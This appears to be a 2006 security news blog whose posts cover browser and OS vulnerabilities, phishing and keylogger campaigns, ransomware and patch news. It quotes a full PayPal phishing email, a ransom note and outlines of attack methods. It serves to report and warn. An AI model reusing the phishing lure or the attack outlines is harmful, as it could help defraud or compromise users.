Solution : Upgrade to phpAdsNew / phpPgAds 2.0.6 or later.
Risk factor : High

Wednesday, May 17, 2006
Less than a week after Apple shipped a mega-update with fixes for a whopping 43 Mac OS X and QuickTime vulnerabilities, independent researcher Tom Ferris said that multiple Safari browser flaws remain unpatched.
Ferris, who has become a bit of a gadfly for Apple, reported the Safari vulnerabilities to Apple on April 19, but after testing the Security Update 2006-003, he said thes issues have not yet been addressed.
Ferris, who goes by the online moniker of "badpack3t," said the Safari bugs causes the application to crash and may allow a malicious attacker to execute arbitrary code. On his Security-Protocols.com Web site, Ferris has released technical information on the flaws alongside proof-of-concept code to reproduce the browser crashes.
Back in April, Ferris also flagged a heap overflow vulnerability when specially crafted ".bmp" are processed and decompressed. Although the Mac OS X update promised a fix for that bug, Ferris insists the underlying issue has not been addressed.
"[The update] does prevent the crash when opening [my] original proof-of-concept file. But after slightly modifying that file, I was able to trigger the same issue with the latest security update installed," Ferris said.
Ferris, who uses fuzzing techniques to identify application bugs, also plans to report several new ".tiff" flaws to Apple's security team. As per policy, Apple does not comment on potential security vulnerabilities in its products until a fix is available. Meanwhile, Mac OS X users are reporting post-patch hiccups that range from system hangs and boot-up problems.

Tuesday, May 02, 2006
Phishing scam artists have recently started using a technique called steganography, where they embed script or code within bitmap images. Up to now, phishing e-mail has used text and images to lure victims to malicious web sites, but this new wave of scam e-mail employs just a single image. The image displays the text, along with authentic looking logos of the spoofed institution (Citibank being the most cited), with code that exploits vulnerabilities to cover its tracks. One way users can avoid these messages is to set their e-mail client to text only, or to block all images.

Monday, April 24, 2006
Microsoft Corp. plans to re-issue a security patch for its Windows operating system that caused serious headaches for some users.
The MS06-015 security update was released last week, but Microsoft customers soon reported that it was causing applications to crash thanks to a conflict between the patch and NVidia Corp.'s video drivers and Hewlett-Packard Co.'s Share-to-Web photo-sharing software.
The new update is presently being tested, and is expected to be released next Tuesday, the same day that Microsoft is scheduled to release its non-security updates for the month.
"What we have done is re-engineered the MS06-015 update to avoid the conflict altogether with the older Hewlett Packard and NVidia software," wrote Microsoft security response center program manager Stephen Toulouse in a Friday blog posting. "What the new update essentially does is simply add the affected third party software to an 'exception list' so that the problem does not occur."
The update will also provide an automated way of fixing the Windows registry configuration database on affected systems, a work-around that had been previously suggested by Microsoft.
Multiple vulnerabilities have been reported in Apple Mac OS X and applications. Proof of Concept code has already been posted along with the information regarding the vulnerabilities. At this time no patches or workarounds appear to be available for the majority of the vulnerabilities. The impact is Denial of Service or arbitrary code executed remotely, and severity is highly critical.
Links to advisories:
Apple OS X 10.4.5 .tiff "LZWDecodeVector ()" Heap Overflow
http://www.security-protocols.com/sp-x24-advisory.php
Apple OS X BOM ArchiveHelper .zip Heap Overflow
http://www.security-protocols.com/sp-x25-advisory.php
Apple OS X Safari 2.0.3 Multiple Vulnerabilities
http://www.security-protocols.com/sp-x26-advisory.php
Apple OS X 10.4.6 "ReadBMP ()" .bmp Heap Overflow
http://www.security-protocols.com/sp-x27-advisory.php
Apple OS X 10.4.6 "CFAllocatorAllocate ()" .gif Heap Overflow
http://www.security-protocols.com/sp-x28-advisory.php
Apple OS X 10.4.6 .tiff "_cg_TIFFSetField ()" DoS
http://www.security-protocols.com/sp-x29-advisory.php
Apple OS X 10.4.6 .tiff "PredictorVSetField ()" Heap Overflow
http://www.security-protocols.com/sp-x30-advisory.php

Saturday, April 08, 2006
Next week's batch of Microsoft patches will do more than update security for Internet Explorer (IE). Patch Tuesday will include a 60-day reprieve for developers still adapting to a February upgrade of Internet Explorer 6.
This may be an admission that changes made to the way the browser handles ActiveX controls created some problems for Internet applications. The patent lawsuit by Eolas Technologies forced the changes to IE.
The non-security update to IE will include a compatibility patch, which offers a reprieve until June for enterprise customers that expressed the need for more time to adapt, Microsoft said Monday.
First released to developers Feb. 9 and then publicly through Windows Update Feb. 28, the update scheduled for April 11 will require IE users to manually enable ActiveX controls embedded in Web pages. While new computers ship with the updated IE, Microsoft saw a need to give developers more time to adapt, according to the Microsoft Security Response Center blog.
While the software giant is providing Web sites a reprieve from the ActiveX changes, the company emphasizes the patch should be removed as soon as applications are fixed. Microsoft will also release a security patch to address the createTextRange vulnerability, the basis for recently reported IE exploits last month.
The delay in patching the vulnerability has prompted third-party patches to fill the gap.

Tuesday, April 04, 2006
Microsoft is releasing a software update to Microsoft Internet Explorer 6 for Microsoft Windows XP Service Pack 2 (SP2) and for Microsoft Windows Server 2003 Service Pack 1 (SP1). This update changes the way in which Internet Explorer handles some Web pages that use ActiveX controls. Examples of programs that use ActiveX controls include the following:
Adobe Reader
Apple QuickTime Player
Macromedia Flash
Microsoft Windows Media Player
Real Networks RealPlayer
Sun Java Virtual Machine
After you install this update, you cannot interact with ActiveX controls from certain Web pages until these controls are enabled. To enable an ActiveX control, manually click the control. There are also techniques that Web developers can use to update their Web pages. For more information

Friday, March 31, 2006
According to an alert issued by Websense Security Labs, in San Diego, excerpts from actual BBC News stories are being used to lure IE users to Web sites that launch drive-by downloads of bots, spyware, back doors and other Trojan downloaders.
One version of the spammed e-mail seen contains a portion of a BBC News item published on March 27 about the Chinese yuan hitting a post-revaluation high against the U.S. dollar. After the legitimate excerpt, the hackers embedded a "read more" link that points to a Web site that contains a spoofed copy of the BBC News story from the e-mail.
Websense researchers found that the rigged site exploits the unpatched createTextRange vulnerability to download and install a keystroke logger without any user action. The keylogger monitors activity on various financial Web sites and uploads captured information back to the attacker. It appears that this is the work of a well-organized identity theft ring, stealing bank log-ins and other sensitive user information.
The latest twist comes almost a week after the first wave of attacks started dropping a variant of SDbot, a type of back-door attack that gives hackers complete control of infected computers. SDbot allows attackers to control victims' computers remotely by sending specific commands via IRC (Inter Relay Chat) channels.
The earlier exploits were being launched from several legitimate Web sites that were hijacked and seeded with malicious code. These include an airline ticketing system, an insurance sales site and a site that sells e-commerce software.

Wednesday, March 29, 2006
What is not understood is why any government cannot simply have these sites terminated at once. Why is it that phishing is not viewed as fraud and theft? Oh PayPal is a big company it should be up to them. It is not hard to take a site down however as:AS4657 asname: STARHUBINTERNET-AS descr: Starhub Internet, Singapore. If APNIC is responsible for these IP addresses it seems that a law governing how one is responsible for their AS numbers and routes is not that hard. The contact listed for the domain name is Acidhurt@starhub.net.sg Acidhurt is right out on front street how then could ignorance of the crime be possible? Visit the site here.. With all the members pictures to see who might be responsible. How hard is this really to figure out? What seems to be clear is that this type of activity is no longer hidden it is right out in the open.

We are writing to let you know that you have to update Your account information.
To update Your information follow the link below and login into your PayPal account to read it:
https://www.paypal.com/update/cgi-bin?messageID=IDHMIFuomIUH8
This is the PayPal Inc. online department. If you have received this email by mistake please ignore and delete it.

Tuesday, March 28, 2006
The unofficial fix blocks access to the vulnerable component in the Microsoft Web browser, preventing malicious Web sites from taking advantage of the vulnerability, said Steve Manzuik, security product manager at eEye in Aliso Viejo, Calif. Microsoft does not have a fix for the flaw available yet.
Though eEye's patch does protect PCs against attacks that take advantage of the flaw, the company recommends installing the fix only as a last resort. "Organizations should only install this patch if they are not able to disable Active Scripting as a means of mitigation," Manzuik said. Disabling Active Scripting is Microsoft's suggested work-around.
"This patch is not meant to replace the forthcoming Microsoft patch, rather it is intended as a temporary protection against this flaw," Manzuik said.
eEye, which makes an intrusion-prevention product called Blink, crafted the fix at the request of its customers, Manzuik said. "Customers who don't have Blink deployed yet were looking for a temporary solution," he said. However, eEye has made the fix available for anyone, on its Web site.
Microsoft doesn't recommend installing eEye's fix. "We have not tested this mitigation tool," said Stephen Toulouse, a program manager in Microsoft's Security Response Center. "We can't recommend it because we have not tested it...Customers should weigh the risk of applying something like this to their systems."
The vulnerability has to do with how Internet Explorer handles the "createTextRange()" tag in Web pages. Since the flaw was disclosed publicly last week, more than 200 Web sites have been found to exploit it. These sites typically install spyware, remote control software and Trojan horses on vulnerable PCs, according to security company Websense.
Microsoft has also seen the attacks, but Toulouse said "the spread rate appears to be relatively limited." That means there aren't many new attacks being launched. Microsoft is working with law enforcement to take down Web sites that are hosting the attacks, which are often hacked sites, he said.

Monday, March 27, 2006
Security experts have warned internet users to be on their guard against a new phishing and spyware scam targeting 2006 Fifa World Cup enthusiasts. The fraud is executed using bogus emails claiming to be from MasterCard offering free travel and tickets to the World Cup finals in Germany.
Recipients of the malicious emails are encouraged to click on a link to claim the prize. But doing so results in a key-logger downloading to the user's desktop. When the infected user accesses a variety of legitimate online banking sites, the key-logger mimics the website and captures personal banking information.
The scam has been detected targeting the following banking websites: bradesco.com.br, itau.com.br, unibanco.com.br, bancoreal.com.br, caixa.gov.br and caixa.com.br, according to security firm SurfControl.

Saturday, March 25, 2006

This is our second warning in first wave of attacks against an unpatched flaw in Microsoft's Internet Explorer browser has already begun, and security experts warn that the threat will grow significantly over the weekend.
Less than 24 hours after Microsoft issued details for IE users, malware hunters have started detecting drive-by downloads on more than 20 maliciously rigged Web sites.
It is already reported that a list of more than 20 unique domains and 100 unique URLs hosting the exploits, which are dropping a variant of SDbot, a dangerous family of backdoors that give hackers complete ownership of infected computers.
SDbot allow attackers to control victims' computers remotely by sending specific commands via IRC (Inter Relay Chat) channels. The backdoors have also been used as a keylogger to steal sensitive user information and spread to local network and to computers vulnerable to exploits.
Some of these attackers are the same people that were exploiting the WMF vulnerability. This will continue to get worse over the weekend, especially if they can figure out how to get the exploits to work efficiently.
One of the interesting things we're seeing is that the shell code doesn't work on a lot of these sites. That suggests they're testing the exploits and getting ready to do some major damage.
In addition to SDbot variants, the sites are dumping spyware and keystroke loggers on machines without requiring any user action. Simply surfing to these sites will hose your machine.

Thursday, March 23, 2006

Microsoft plans to release a pre-patch advisory with workarounds for a "highly critical" vulnerability that could put millions of Internet Explorer users at the mercy of malicious hackers.
The advisory, which will be posted here, acknowledges a code execution hole that was discovered and publicly reported by Secunia Research of Copenhagen, Denmark. Secunia said in an alert that the vulnerability is due to an error in the processing of the "createTextRange()" method call applied on a radio button control.
"This can be exploited by a malicious Web site to corrupt memory in a way that allows the program flow to be redirected to the heap," Secunia said in the alert, warning that successful exploitation allows execution of arbitrary code whenever the target visits the rigged Web site.
The vulnerability was confirmed on a fully patched system with IE 6.0 and Microsoft Windows XP SP2. It has also been confirmed in IE 7 Beta 2 Preview, Secunia said. The MSRC (Microsoft Security Response Center) said in a blog entry that users of the new refresh of the IE7 Beta 2 Preview announced at Mix '06 are not affected. Lennart Wistrand, a program manager in the MSRC, recommended that IE users turn off Active Scripting to prevent a possible attack.
"Customers who use supported versions of Outlook or Outlook Express aren't at risk from the e-mail vector since script doesn't render in mail [being read in the restricted sites zone]," Wistrand added. The latest warning comes just 24 hours after the discovery, and public release, of a denial-of-service bug in the dominant Web browser.

Tuesday, March 21, 2006
As the April 15th tax filing deadline approaches, cyber fraudsters are planning their attack on online tax filers to steal confidential information. Websense, Inc. (NASDAQ:WBSN) , a global leader in web security and web filtering productivity software, today announced that Websense(R) Security Labs(TM) has seen a rise in phishing attacks via fraudulent emails and websites that spoof the Internal Revenue Service (IRS). Since December 2005, Websense Security Labs has been working together with the IRS and other organizations to investigate the rise of tax scams and better protect consumers and employee computing environments from increasingly sophisticated and dangerous internet security threats.
Websense Security Labs has discovered tax attacks targeting the U.S. in several countries outside of the U.S. hosted on compromised web servers. For example, one of the largest IRS phishing campaigns claims that the taxpayer is eligible for a refund and needs to log on to a website to verify their information. Users receive one of a variety of email messages with a link to a fraudulent website. Upon accessing the spoofed tax website, the user is then forwarded to a fraudulent site that requests credit card information and other personal identifiers. The intent of these attacks is to dupe users into revealing confidential information which can be used for withdrawing funds.
Phishing can present a serious security risk for consumers and organizations. Phishers are becoming more sophisticated in their deception techniques to lure employees to spoofed websites, as most employees cannot determine which is a genuine site and which is a fake. However, employees don't have to "fall for the phish" and actually enter confidential information on a phishing website to be compromised. For example, recent trends indicate that by just visiting a website, many types of phishing URLs can install spyware, such as a malicious keylogger, which has the ability to capture data including network passwords or social security numbers without their knowledge. It only takes one employee to click on a phishing site and accidentally give out confidential corporate data, customer records, network passwords, or trade secrets, to jeopardize an entire organizations' intellectual property. Full Article

Sunday, March 19, 2006
The article is a post from Schneier on Security. Bruce Schneier, said "This" is great work by Yossi Oren and Adi Shamir:
Abstract (Summary)
We show the first power analysis attack on passive RFID tags. Compared to standard power analysis attacks, this attack is unique in that it requires no physical contact with the device under attack. While the specific attack described here requires the attacker to actually transmit data to the tag under attack, the power analysis part itself requires only a receive antenna. This means that a variant of this attack can be devised such that the attacker is completely passive while it is acquiring the data, making the attack very hard to detect. As a proof of concept, we describe a password extraction attack on Class 1 Generation 1 EPC tags operating in the UHF frequency range. The attack presented below lets an adversary discover the kill password of such a tag and, then, disable it. The attack can be readily adapted to finding the access and kill passwords of Gen 2 tags. The main significance of our attack is in its implications any cryptographic functionality built into tags needs to be designed to be resistant to power analysis, and achieving this resistance is an undertaking which has an effect both on the price and on the read range of tags.
My guess of the industry's response: downplay the results and pretend it's not a problem.
GPG is an open-source version of the PGP e-mail encryption protocol. Recently, a very serious vulnerability< was discovered in the software: given a signed e-mail message, you can modify the message -- specifically, you can prepend or append arbitrary data -- without disturbing the signature verification.
It appears this bug has existed for years without anybody finding it.
Moral: Open source does not necessarily mean "fewer bugs." Bruce Schneier wrote aboutthis back in 1999.
UPDATED TO ADD (3/13): This bug is fixed in Version 1.4.2.2. Users should upgrade immediately.
Schneier on Security

Thursday, March 16, 2006
The number of victims in the world's largest identity theft case could surpass one million, authorities in South Korea have reported.
Police announced this week that the number of victims of ID theft connected to the online game Lineage is between 980,000 and 1.22 million, according to the Korea Herald.
The game's developer, NCsoft, said that, as of Sunday, it has received confirmation from over 175,000 people in South Korea that their national identity numbers have been used without their knowledge to register accounts in its Lineage series of multiplayer online role-playing games.
As reported on vnunet., the bogus accounts were apparently used by China-based groups to generate virtual items in the game world which were then sold to gamers in exchange for real world cash.
Police now report that they have traced email addresses to China. Approximately 1,500 different IP addresses were used to connect to the illegal accounts.
New account registrations which provided a free trial period of several days could previously be obtained simply by entering an ID number into an online form. NCsoft said that it has since tightened up its registration procedures.
Previous reports estimated the number of active, legitimate Lineage accounts at between three and four million.
Despite the surprising addition of about one million new accounts in only four months, the company was slow to take action, according to local press reports. News of the unprecedented ID theft did not become public until February.
Police have suggested that the huge number of stolen Korean ID numbers could have been handed over during a legitimate business deal between Korean online shopping websites and their Chinese subcontractors.
Earlier reports blamed hackers for stealing the ID numbers from Korean websites' databases.
In a case in which damage claims could theoretically exceed $1bn, Korean lawyers are planning to sue NCsoft for $1,000 per ID theft victim in a class action lawsuit. Reports late last month said that 3,500 potential plaintiffs had joined the action so far.
The furore generated by the case has reportedly led the Korean government to strengthen ID theft penalties with a new three-year jail sentence for offenders.
Adobe is urging users of its document and graphics server equipment to harden their systems after the discovery of a critical flaw.
Danish vulnerability testing firm Secunia first reported the flaw, which it describes as 'moderately critical', in July 2005 but it has taken until now for Adobe to fix the problem. Adobe has issued an advisory on its website.
The problem is caused when the 'saveContent' and 'saveOptimized' Adobe Document Server commands are used. This may save files anywhere on the system, including those areas with full access privileges.
"This can be exploited by sending a specially crafted Soap request to the web service to write a graphics file containing malicious JavaScript as metadata to e.g. the server's 'All Users' start-up folder," warned Secunia.
"The request can be constructed to save this graphics file with an HTA extension causing the file to be executed the next time any user logs in.
"A request containing 'loadContent' can also be sent to retrieve arbitrary graphics or PDF files from the server, potentially exposing sensitive information."
Adobe recommends adapting local access controls to mitigate against the problem, and officially thanked Secunia for bringing the issue to its attention.
The Anti-Phishing Working Group (APWG) has reported a sharp rise in the number of phishing attacks, combined with an increased sophistication among attackers.
In its monthly report (PDF) for November 2005 the APWG said that reported attacks grew to 16,882 from 15,820, the third month of growth after a slowdown over the summer.
The UK and Europe were particularly hard hit as phishers looked for new targets outside the US.
The bulk of targets are still financial companies at nearly 95 per cent of attacks in November, up from 86 per cent in October.
There is also evidence that phishers are refining their targets lists, since the number of brands attacked has fallen despite the overall increase in activity.
Almost a third of all phishing sites are hosted in the US. South Korea is the second most popular host at 11.34 per cent, reflecting the country's high levels of broadband penetration.
There is also worrying evidence that attacks are getting smarter. The APWG noted an increased in legitimate sites being cracked and used to spread malware.
"A good example of this scheme was exhibited by an attack on the ShangHai Huizhong Automotive Manufacturing Company, one of the largest car manufacturers in China," the report said.
"Crackers programmed the site to deliver key-loggers to the PCs of consumers visiting the ShangHai Huizhong site, installing a system that attempted to load and run malicious code on the visitors' PCs."
The APWG also found a much higher percentage of domain name server redirections using Trojan software.
One example occurred when a 'security tool' was emailed out claiming to be from PayPal which, once ex ecuted, automatically redirected any attempt to access PayPal to a phishing site hosted in India.
There is also little sign that website hosting companies are getting any better at shutting down phishing sites once they are discovered. The average time such a site stayed up was 5.5 days, unchanged from October.
Web monitoring firm Netcraft has warned that a web server belonging to a state-operated Chinese bank is hosting phishing sites targeting US banks and financial institutions.
"This is the first instance we've seen of one bank's infrastructure being used to attack another institution," said Netcraft.
The company revealed that the phishing emails sent over the weekend targeted customers of Chase Bank in the US and eBay, and were directed to sites hosted on IP addresses assigned to the Shanghai branch of the China Construction Bank.
"The phishing pages are located in hidden directories with the server's main page displaying a configuration error," said Netcraft.
Recipients of the emails were offered the chance to earn $20 by filling out a user survey which presented a series of questions.
This was followed by a request for user ID and password so that the $20 'reward' could be deposited into the proper account.
The form also requested the victim's bankcard number, Pin, card verification number, mother's maiden name and Social Security number. Any data submitted was then sent to a free form processing service on a server in India.
One giveaway was that the URL in the phishing email used an IP address rather than a domain, typically a strong indicator of a phishing site.
Netcraft warned that the same IP address at the China Construction Bank in Shanghai was used over the weekend to host a page spoofing the eBay log-in screen.

Tuesday, March 14, 2006

Virus hunters have discovered a new Trojan that encrypts files on an infected computer and then demands $300 in ransom for a decryption password.
The Trojan, identified as Cryzip, uses a commercial zip library to store the victim's documents inside a password-protected zip file and leaves step-by-step instructions on how to pay the ransom to retrieve the files.
It is not yet clear how the Trojan is being distributed, but security researchers say it was part of a small e-mail spam run that successfully evaded anti-virus scanners by staying below the radar.
While this type of attack, known as "ransomware," is not entirely new, it points to an increasing level of sophistication among online thieves who use social engineering tactics to trick victims into installing malware, said Shane Coursen, senior technical consultant at Moscow-based anti-virus vendor Kaspersky Lab.
The LURHQ Threat Intelligence Group, based in Chicago, was able to crack the encryption code used in the Cryzip Trojan and determine how the files are encrypted and the payment mechanism that has been set up to collect the $300 ransom.
According to a LURHQ advisory, Cryzip searches an infected hard drive for a wide range of widely used file types, including Word, Excel, PDF and JPG images. Once commandeered, the files are zipped and overwritten the text: "Erased by Zippo! GO OUT!!!"
The Trojan then deletes all the files, leaving only the encrypted file with the original file name, followed by the "_CRYPT.ZIP" extension.
A new directory named "AUTO_ZIP_REPORT.TXT" is created with specific instructions on how to use the E-Gold online currency and payment system to send ransom payments.
The instructions, which are marked by misspellings and poor grammar, contain the following text: Your computer catched our software while browsing illigal porn pages, all your documents, text files, databases was archived with long enought password. You can not guess the password for your archived files - password lenght is more then 10 symbols that makes all password recovery programs fail to bruteforce it (guess password by trying all possible combinations).
The owner of the infected machine is warned not to search for the program that encrypted the data, claiming that it simply doesn't exist on the hard drive. If you really care about documents and information in encrypted files you can pay using electonic currency $300," the note says. Reporting to police about a case will not help you, they do not know password. Reporting somewhere about our E-Gold account will not help you to restore files. This is your only way to get yours files back.
The Trojan author uses scores of E-Gold accounts simultaneously to get around potential shutdowns, according to LURHQ, which published the complete list of E-Gold accounts in the advisory.
Officials from E-Gold, which operates out of the Caribbean island of Nevis, were not available for comment.
"Infection reports are not widespread, so it is not believed this is a mass threat by any means," LURHQ said. However, the company said social engineering malware is typically more successful when it is delivered in low volume to get around anti-virus detections. "[M]ore attention means the likely closing of the accounts used for the anonymous money transfer," LURHQ said.

Sunday, March 12, 2006
One of the most commonly exploited vulnerabilities is the buffer overflow. Buffer overflows occur when too much information can be written to a predefined memory buffer, causing a program to fail.
There are many tools that let hackers exploit this vulnerability, and knowing them will help you learn how to prevent their successful use on your systems.
One such tool is Digital Monkey's Buffer Syringe, a relatively simple, minimally documented tool that lets hackers exploit buffer overflows. In fact, Buffer Syringe includes several usage examples that make implementation of the tool a snap.
Understanding how Buffer Syringe and tools like it work should give IT managers much more confidence when evaluating, for example, a Windows vulnerability assessment tool or patch management system because it will reveal the ins and outs of how the buffer overflow is constructed.
With this information, IT managers can then exact much more specific and telling information from vendors of commercial vulnerability assessment tools as to how their tools detect such weaknesses. Thus armed, it will be much easier to evaluate, select, implement and use such tools over time.
Early in the methodical stalking of an IT resource, hackers will enumerate and identify systems in a network, looking for something of interest. After identifying an interesting target, smart hackers will gently test to see if any part of a system was left in a default configuration. Such a configuration provides easy back-door entry into what might look from the front like an impregnable fortress.
For Windows systems, start with sysinternals.com, where you'll find a host of useful no-cost and commercial diagnostic tools. -http://sysinternals.com/
Go to nessus.org to become familiar with one of the most widely used vulnerability assessment tools available. Nessus can probe a wide range of server and desktop operating systems and is frequently updated. - http://nessus.org/

Monday, February 20, 2006
A rare piece of malicious software targeting Apple's Mac OS X operating system - instead of the more common victim, Microsoft Windows - has been spotted online and appears to be spreading. Like many computer viruses, the bug lures people to click on it by posing as something else, in this case a file containing a picture of the next-generation Apple operating system.
The malicious software causes computer programs to crash and transmits itself through an instant message program for the Mac called iChat. To get infected, users must download the file, called "latestpics.tgz," and install it on their computer. Infected computers will then automatically attempt to send the program to all contacts on the infected user's "buddy list."
Mac users typically have not had to worry about the computer worms and viruses that regularly hit the Windows-using world. It's a regular debate among techies whether this is because the Mac operating system is inherently more secure or whether computer hackers simply do not bother attacking an operating system that is not widespread. Apple Computer Inc. has less than 5 percent of the U.S. computer market.
Apple released a statement yesterday warning users to download files from only companies they have confidence in. "Apple always advises Macintosh users to only accept files from vendors and Web sites that they know and trust," read the statement. Apple's Web site yesterday afternoon did not appear to give Mac users any notice of the bug, and a spokesman was uncertain whether the company would update its operating system in response to this specific threat.
Hackers have released software that could be used to take over Windows PCs that lack the latest Microsoft security patches. But while this code is dangerous, security experts said today that it had yet to be used by attackers in any widespread way.
The attack code exploits two separate bugs in Windows Media Player, which were addressed in Microsoft's MS06-005 and MS06-006 advisories released Tuesday.
The MS06-005 bug concerns a flaw in the way the Media Player processes bitmap files, while MS06-006 has to do with the Media Player plug in for non-Microsoft browsers.
Of these two bugs, Microsoft rated only MS06-05 as critical, but both could be exploited to seize control of an unpatched machine, according to the French Security Incident Response Team Web site, which has published examples of the malicious code.
In fact, the code that takes advantage of the MS06-006 flaw may be of greater concern to Windows users, said Craig Schmugar, virus research manager with McAfee Inc.'s Avert Labs. "From a vulnerability side, MS06-005 is a concern, but from what we've seen so far, the MS06-006 exploits are further along."
So far, none of the code is being used much by attackers, he said. "Clearly there's been activity on the exploit-code writing side, but we haven't seen that translate into impacting customers."
Another security researcher agreed with Schmugar's assessment. "Yesterday we got a lot of reports of [the code] being used, but they turned out to be false positives," said Johannes Ullrich, chief technology officer of the SANS Internet Storm Center. "I haven't seen anything really used in the wild."
Security intelligence outfit iDefense Labs is offering a $10,000 reward to any hacker who finds a worm hole in Microsoft's products, but the software maker isn't exactly thrilled by the gambit.
One day after iDefense, of Reston, Va., announced the bounty as part of a newly implemented quarterly hacking challenge, Microsoft, based in Redmond, Wash., believes paying for flaws is not the best way to secure software products.
Of course Microsoft believes that responsible disclosure, which involves making sure that an update is available from software vendors the same day the vulnerability is first broadly known, is the best way to protect the end user.
The hacking challenge is part of VeriSign-owned iDefense's controversial VCP (Vulnerability Contributor Program), which offers financial incentives to anonymous researchers who agree to give up exclusive rights to advance notification of unpublished vulnerabilities or exploit code.
iDefense Labs, defended the new program, insisting that it promotes the concept of responsible disclosure and keeps information on critical zero-day flaws away from malicious attackers.
It is strange that Microsoft offers $250,000 as a bounty to help capture a virus writer, but frowns on paying for the information that would stop the propagation of the virus.
Should all vendors should be paying for vulnerabilities? In a free enterprise, everything has a cost and a value. We have recognized that value and we're willing to pay for it. Then vendors should be doing the same thing?
Peter Mell, a computer scientist who manages the NIST (National Institute of Standards and Technology) NVD (National Vulnerability Database), said dangling incentives for hackers to target a single vendor could set a dangerous precedent.

Thursday, February 16, 2006
If the big boys such as Sun Microsystems, Cisco Systems and Microsoft have their way, enterprises soon will have little use for the wares that most of the security vendors here are hawking.
It's rare that those three vendors would all agree on anything, but in speeches and interviews this week, executives from all of them have said that it's time to build security into hardware and software from the ground up and stop trying to fix problems after the fact.
Of course, each vendor has a different idea about how to accomplish that goal, but the underlying idea is the same: Make security an integral part of the network, and not an add-on.
To Cisco, this means enterprises buying into the company's Self-Defending Network strategy. In his keynote speech at the conference, Cisco CEO John Chambers showed off the company's new Security Management Suite, which is designed to automate protection features and management among routers, switches and client devices.
The Cisco Security Manager piece of the suite will enable administrators to create flexible policies that can be shared among devices and then modified on the fly to defend against new threats.
"Automating that process is a fairly scary thing for a lot of people. Integration is classically the hardest and most expensive thing going. Will we get to automation? Yes, but this is more of an interim step to help solve the problem."
Sun executives have their own ideas about where security should lie. They believe security should be provided not by firewalls, IDS boxes or anti-virus scanners, but by the network infrastructure and the software running on it.
The company has started shipping its Trusted Extensions for Solaris, a toolkit that hardens the operating system. The idea is to make security a transparent part of the OS, not a group of add-on features.
Redmond is not standing still either. Many of the features, such as integrated anti-spyware software and upgraded online identity management tools, are things that dozens of security vendors are trying to sell as stand-alone products.
Many observers believe that once those technologies are integrated into Windows, they will quickly become commodities, much like browsers are today. But Gates knows there is still much more work to be done on security, by Microsoft, Sun, Cisco and hundreds of other companies.

Friday, February 10, 2006
Microsoft Corp. announced final licensing and pricing information for its soon-to-be-released Windows OneCare™ Live, the all-in-one, automatic and self-updating PC care service aimed at helping consumers more easily protect and maintain their PCs to keep them running well. Now available free to new beta testers in the United States, at http://ideas.live.com, Microsoft® Windows OneCare Live will be available in June from retailers and via the Web for an annual subscription of $49.95 MSRP for up to three personal computers. To thank its valuable beta customers and offer an easy transition to the paid service, Microsoft also announced today a promotional deal offering the first year of Windows OneCare Live service for $19.95 to beta customers who become subscribers between April 1 and April 30, 2006.
“Consumers have made it clear they need more assistance than what’s offered today, and we are excited to deliver the value of improved protection and maintenance in one comprehensive solution,” said Ryan Hamlin, general manager of the Technology Care and Safety Group at Microsoft. “Windows OneCare Live eases the frustration of protecting your PC and gives consumers greater peace of mind so they can spend less time worrying and more time doing the things they enjoy.”
Windows OneCare Live helps make it simpler and easier for consumers to enhance the overall health of their personal computers by offering automated protection, maintenance, performance tuning and support in an all-in-one package. Hundreds of thousands of people have tested Windows OneCare Live since the beta was launched in November 2005, and Microsoft has continually added features — such as backup for external hard drives — based on their feedback. People have particularly liked the simplicity of the all-in-one nature of the service and, according to recent surveys conducted by Microsoft with Windows OneCare Live beta testers, the vast majority of testers said they would recommend it to a friend or relative.
Full Article

Saturday, February 04, 2006
As the world waited for one computer virus to strike on Friday, another wriggled its way into the Russian stock exchange and knocked it offline.
Computer experts had warned that 3 February could bring gloom for many as a computer virus called Nyxem was scheduled to start deleting files on machines it had infected.
Nyxem is programmed to randomly delete Word, Excel and PowerPoint documents as well as pdf files, zip files and several other file types. The virus was released several weeks ago and has spread by forwarding itself to email addresses found on the computers it infects.
But widespread damage failed to materialise and by early evening UK time on Friday several anti-virus companies said they had received no reports of incidents involving Nyxem. Patches against the virus had been released on 16 January.
But a collective sigh of relief was tempered by news that the Russian stock exchange has been subjected to an attack instigated by an unnamed, and apparently unrelated, computer pest.
Specific hack
Dmitry Shatsky, vice president of the Russian Trading System (RTS) said in a statement that a virus had infected a single computer used to test trading software that was connected to the internet. The entire network had to be temporarily shut down on Thursday as experts sought to isolate the infected machine and scanned others PCs for signs of infection.
Russian anti-virus company Kaspersky said sources had revealed that the infected machine was controlled remotely to launch a denial-of-service (DoS) attack against other systems on the trading network.
This involves bombarding a system with huge amounts of irrelevant information in an attempt to bring it down.
"While all the world was in a frenzy over the damp squib that was Nyxem, this attack infiltrated the RTS and could have potentially given hackers access to their systems," adds Graham Cluley, senior technology consultant for computer-security firm Sophos. "A virus which can disrupt a stock exchange can have obvious financial consequences, as well as harm the important credibility of an institution in the public's eye."

Thursday, February 02, 2006
The Mozilla Foundation has shipped the first patch for its flagship Firefox 1.5 browser to plug a series of security vulnerabilities and memory leaks.
The open-source group has started pushing out Firefox 1.5.0.1 as an automatic update and recommended that all users apply the upgrade to protect against a known denial-of-service bug and several undisclosed security issues.
"We recommend that all users upgrade to this latest version," Mozilla said in a note posted online. In addition to security patches and fixes for memory leak issues, Firefox 1.5.0.1 also promises improved stability and improved support for Mac OS X.
The Foundation did not release details on most of the security flaws being fixed. The published list of patched Firefox vulnerabilities has not been updated to reflect the new browser release.
The exploit was confirmed on Firefox 1.5 on Windows XP SP2 (Service Pack 2) and is caused by an error in the way the open-source browser handles large history information. A successful attacker can fill the browser's "history.dat" file with large history information by tricking a user into visiting a malicious Web site with an overly large title.

Tuesday, January 31, 2006

Win32/Mywife.E@mm is a mass-mailing network worm that targets certain versions of Microsoft Windows. The worm spreads through e-mail attachments and writeable network shares. It is expected to corrupt the content of specific files on the third day of every month. This threat has been assigned CME identifier CME-24. It will be detected as Win32/Mywife.E@mm!CME-24.
Platform: Windows 2000, Windows XP, Windows Server 2003, Windows ME, Windows 98
CME-24 Microsoft Security Advisory (904420)
Users of Advanced Micro Devices Inc.'s microprocessors may want to think twice before looking for technical support on the company's Web site. Customer support discussion forums on the forums.amd.com site have been compromised and are being used in an attempt to infect visitors with malicious software, an AMD spokesman confirmed Monday.
The problem was first reported Monday in a blog posting by Mikko Hypponen, manager of antivirus research at F-Secure Corp. in Helsinki. As of Monday morning, AMD technicians were still working to resolve the problem, according to AMD spokesman Drew Prairie.
Because AMD had just learned of the problem, Prairie could give few details on how the site was compromised or when AMD expected to have the issue resolved.
